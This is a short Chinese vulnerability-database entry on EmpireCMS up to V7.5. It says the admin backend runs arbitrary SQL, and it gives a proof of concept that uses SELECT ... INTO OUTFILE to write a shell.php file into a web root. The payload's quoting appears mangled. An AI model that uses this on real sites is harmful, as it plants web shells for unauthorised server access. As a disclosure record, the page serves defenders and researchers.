EmpireCMS


title: ‘EmpireCMS’
date: Tue, 08 Sep 2020 13:42:30 +0000
draft: false
tags: [‘白阁-漏洞库’]

### 漏洞范围

EmpireCMS <= V7.5 ### 漏洞验证 由于后端没有对执行的语句做限制导致可以执行恶意sql语句。 ![](/static/baige/01-CMS漏洞/EmpireCMS/HOH@WWOHVQOVSR5K9.png) POC: ``` select '‘ into outfile ‘D:/phpstudy_pro/WWW/shell.php’
“`

根据实际路径修改路径即可。 ![](/static/baige/01-CMS漏洞/EmpireCMS/7MGWYGAV0VX0AO6JNOC3.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容